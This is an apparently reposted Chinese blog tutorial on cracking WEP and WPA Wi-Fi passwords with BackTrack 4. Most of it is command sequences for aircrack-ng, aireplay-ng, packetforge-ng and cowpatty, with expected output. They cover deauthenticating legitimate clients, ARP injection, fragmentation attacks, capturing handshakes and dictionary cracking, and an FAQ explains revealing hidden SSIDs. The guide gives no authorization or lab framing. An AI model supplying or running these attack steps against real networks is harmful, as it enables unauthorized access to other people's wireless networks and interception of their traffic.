BT4xx无线网络之一_慕枫漂泊_百度空间

---------------------pre---------------------
1.下载光盘版BT4.iso,copy其中的boot和bt4到U盘,windows下运行bootinst.bat安装到U盘。VM版的BT4可能对集成的无线网卡支持不太好,USB无线网卡则

支持得很好。

或者用硬盘启动方式:下载光盘版BT4.iso,解压其中的boot和bt4到D盘根目录,下载grub4dos,解压其中的grldr、menu.lst、grldr.mbr,放C盘根目录下
    编辑bcd:
    bcdedit /create /d "Grub" /application bootsector
    回显: 项 {5e098857-4818-11de-b43e-001eec90feb6} 成功创建。
    接着用下面的指令来设置引导参数,{id}替换为上面回显的ID,建议用复制粘贴
    bcdedit /set {id} device boot
    bcdedit /set {id} path \grldr.mbr
    bcdedit /displayorder {id} /addlast
    设置等待时间
    bcdedit /timeout 5
    (
    如果要卸载,运行
    bcdedit
    查看Grub的{id}后,
    bcdedit /delete {id}
    )

2.启动BT4,选console控制台模式,用户名root,密码toor<注意不是root>,再运行sta盘盘rtx启动窗口模式。
另:BT4启动黑屏问题解决办法
输入root toor 登录系统后在输入 fixvesa 然后 startx如果不行就输入 fixvmware,然后输入startx.还是不能就输入Xorg -configure 然后startx

我的笔记本产U盘启动BT4,startx时按住空格可以进入.。

问题:我在启动bt3 的时候,输入startx黑屏
解答:在输入用户名root 和密码toor 以后输入xconf 这时会黑屏一会,然后出来提示符再输入startx 可进入
win窗口;当实在不能进入win窗口的时候你也可以直接在提示符下输入各xx命令,同时可用alt+f1 打开
一个shell,alt+f2 打开第二个shell,alt+f3 打开第三个等。关闭窗口用PRINT SCREEN 键
---------------------end---------------------

[] 可选
<> 回显
/ 或者
() 注示

---------------------WEP---------------------
shell 1:----------------------------------------
1.ifconfig -a
<wlan0 ... xx:xx:xx:xx:xx:xx>
[
macchanger -m 00:11:22:33:44:55 wlan0
<修改自己网卡的MAC 地址。当对方设置了MAC 地址过滤时或为了方便后面输入>
]
2.ifconfig -a wlan0 up
3.airmon-ng start wlan0
如果这里回显<(monitor mode enabled)> 则下面命令所有端口号要用"wlan0"
4.airodump-ng mon0
5.airmon-ng stop mon0
6.airmon-ng start mon0 6
<monitor mode enabled on mon0>
(6是频道)
[
aireplay-ng -9 mon0 / aireplay-ng --test mon0
<Injection is working/No anwser>(注入攻击成功/不成功)
(检测你的网卡是否支持注入)
]
7.airodump-ng -w pack -c 6 mon0/wlan0
(pack是随便起的获取的ivs的保存文件的名字)
另一说用airodump-ng --ivs -w pack -c 6 mon0/wlan0

shell 2:----------------------------------------
一、有客户端:
xx:abcd四种方式
a.合法客户端产生大量有效的数据,能直接获得大量cap。
收到10000以上data后,直接转shell 3,xx密码
b.合法客户端只能产生少量数据,就需要注入<-3>攻击加速产生大量数据。
8.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) mon0/wlan0
<Read 11542 packets <got 12587 ARP ...>,send 71524 packets ... 很多类似行>
c.合法客户端不在通信,注入模式不成功,
用-0 冲突模式强制断开合法客户端和ap连接,使之重新连接,
新连接所产生的握手数据让-3 获得有效的ARP从而完成ARP注入
8.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) wlan0
9.aireplay-ng -0 10 -a 000000000000(APmac) -c 111111111111(合法客户端mac) wlan0
(要另开shell 3运行)
d.有客户端,并且客户端能产生有效arp 数据的另类xx方式
输入modprobe –r iwl3945
(加载网卡)
输入modprobe ipwraw
输入airmon-ng start wlan0 6
现在,只要一个命令就搞定,输入:
输入wesside-ng -i wlan0 -v 01:02:03:04:05:06<此格式的APmac>。
<key: 12:34:56:78:90>

二、无客户端:
8.aireplay-ng -1 0 -a 000000000000(APmac) -h 111111111111(Mymac) mon0
或用aireplay-ng -1 0 -e Kingnet -a (APmac) -h (Mymac) mon0/wlan0
<Authentication successful>
<Association successful>
(建立虚拟伪装连接)
如果失败可尝试降低网卡速率后再试:iwconfig mon0 rate 2M(注意大写)
xx:abc四种方式
a.-2 crack mode ---------------
-2交互攻击模式集合了抓包,提数据和发包攻击
9.aireplay-ng -2 -p 0841 -c ffffffffffff -b (ap mac) -h (my mac) wlan0
发包成功后可得到足够的ivs,然后用aircrack-ngxx
[
aireplay-ng -2 -p 0841 -c ffffffffffff -r replay_src-xxxx-xxxxxx.cap -b $apmac -h $mymac $interface
]
(如果被中断后用这条命令可以借用前面的包继续)
b.-4 crack mode ---------------
-4攻击模式
9.aireplay-ng -4 -b (APmac) -h (Mymac) mon0
<?yes>
<Saving keystream in replay_dec-0523-075615.xor>
10.packetforge-ng -0 -a (APmac) -h (Mymac) -k 255.255.255.255 -l 255.255.255.255 -y replay-xxx.xor -w myarp
(提取上面xor 文件来伪造一个arp包)
11.aireplay-ng -2 -r myarp mon0
或用aireplay-ng -2 -r myarp -x 512 mon0
(发现了可利用的myarp的数据包,按y后,立刻注入攻击。Date疯涨)
(512是攻击速度,1024是{zd0}值)
c.-5 crack mode ---------------
-5碎片攻击模式
9.aireplay-ng -5 -b (ap mac) -h (my mac) mon0
<?yes>
<Saving keystream in fragment-1216-201426.xor>
(利用-5 碎片攻击模式获得一个可用的包含密钥是数据文件(xor 文件))
10.packetforge-ng -0 -a (APmac) -h (Mymac) -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxx.xor -w myarp
(Myarp随便起的文件名)
<Wrote packet to: myarp>
11.aireplay-ng -2 -r myarp -x 256 mon0
<?yes>
(这时,前面的抓包窗口上的data 将迅速增加)
(512是攻击速度,1024是{zd0}值)

shell 3:----------------------------------------
aircrack-ng *.cap
如果shell 1用了--ivs 参数,则这里用aircrack-ng *.ivs
(我成功了)
另一说用aircrack-ng -n 64 -b APmac pack-01.cap
<KEY FOUND! [......] <ASCII:XXXXX>>

附:
5100用BT4+spoonwep2xx
1.把spoonwep2放在BT4\modules\下,启动BT4
2.
ln -fs bash /bin/sh
ls -al /bin/sh
<显示bash为成功,dash为失败>
3.开spoonwep2,里面可以找到网卡了,选wlan0进入搜索,但这时不会搜出来什么,
关闭一下spoonwep2再重启spoonwep2,
这时网卡项里有一个mon0的,选mon0,driver选normal,mode选unknow victim,选定PO841 replay attack,点击launch后就等待密码的出来(sata数据包到

30000个左右)。
(注:论坛中的高手说spoonwep2支持5100AGN网卡注入式xx)

---------------------end---------------------
---------------------WPA---------------------
1.ifconfig -a
<wlan0 ... xx:xx:xx:xx:xx:xx>
2.ifconfig -a wlan0 up
3.airmon-ng start wlan0 6
<monitor mode enabled on mon0>
(6是频道)
4.airodump-ng -w 12345 -c 6 mon0/wlan0
(保存名为12345.cap)
(-w:写入文件,-c:截取cap的频道)
5.aireplay-ng -0 10 -a (ap mac) mon0/wlan0
或者输入:aireplay-ng -0 10 -a (ap mac) -c (合法客户端mac) mon0/wlan0(wlan0可能不对)
<18:56:20 Sending 64 directed DeAuth,... 一些类似行>
(-c后面为合法无线客户端的MAC地址)
(迫使AP重新与已连接的合法客户端重新握手验证)
(攻击几次后可以做xx尝试。WPAxx不用等到数据Data 达到几万,
   因为它只要一个包含WPA握手验证包就可以了)
Cap数据包xx:
a.暴力xx
6.aircrack-ng -x -f 2 12345*.cap
另一说是用aircrack-ng -z -b (ap mac) 12345*.cap
b.字典xx
6.aircrack-ng -w password.txt 12345*.cap
另一说是用aircrack-ng -w password.txt -b (ap mac) 12345*.cap
(
-w:是字典xx模式
Password.txt是你事先准备好的字典。
技巧:可以在windows 下使用下载的字典工具生产字典,再在BackTrack3 下拷贝到/root 下(aircrack 默认
的工作目录在/root)。
请注意,xxWPA 密码的时间取决于密码难易程度,字典包含程度,内存及CPU 等。多则数小时。
   )
c.把CAP数据包拷贝出来在WIN下用WinAircrack xx
启动WinAircrack,General-)Encryption type-)wpa-psk,Capturefiles-)12345-01.cap
                  Wpa-)Dictionary file-)pswd.txt,点右下角Aircrack the key...
<Key Found! [xxxxxxxx]>
d.HASHxx
6.genpmk -s Kingnet -d Kingnet.hash -f dict.txt (注意大小写)
(Windows版本操作步骤与其Linux下版本xx一致)
(
    -f 字典文件
    -d 哈希文件
    -s AP SSID
    -r 握手包
   )
7.cowpatty -s Kingnet -d Kingnet.hash -r pack-01.cap
e.用ewsaxx,未注册版可以破出密码前两位,再用winhex到内存中去根据前两位查找密码


---------------------end---------------------

WPAxx,怎么知道有握手包被截获?
airodump-ng监视窗右上角有提示:
...... WPA handshake: 00:90:4c:8e:00:65

BT4抓包后,cap文件保存在哪?
输入ls可以看到啊,默认在root下。

如何获得合法端mac?
windows下可以使用OmniPeek、Wireshark、Ethereal、Aircrack-ng for Windows等工具实现对客户端MAC的拦截,Linux可用Kismet、Aircrack-ng中的

airodump-ng等来实现。
前面{dy}个shell,如下若有station显示,bb:bb:bb:bb:bb:bb就是合法客户端mac
BSSID             STATION ...
aa:aa:aa:aa:aa:aa bb:bb:bb:bb:bb:bb

如何查找隐藏的SSID?
方法一:
1.在BT4下先打开一个shell,输入
    airodump-ng 网卡端口
2.打开另一个shell,输入
    aireplay-ng -0 10 -a AP'MAC -c 合法客户端'MAC 网卡端口
可能这个命令由于频道不对会出错,这时就要多重输几次(如果不行,就是不是合法客户端,要再试其它的客户端),直到提示成功为止
3.然后就可以在上个shell,看到显示出来的SSID。
方法二:
运行"kismet",等一会儿SSID就会以蓝色显示出来。

其实xxwep用bt3就很好了



郑重声明:资讯 【BT4xx无线网络之一_慕枫漂泊_百度空间】由 发布,版权归原作者及其所在单位,其原创性以及文中陈述文字和内容未经(企业库qiyeku.com)证实,请读者仅作参考,并请自行核实相关内容。若本文有侵犯到您的版权, 请你提供相关证明及申请并与我们联系(qiyeku # qq.com)或【在线投诉】,我们审核后将会尽快处理。
—— 相关资讯 ——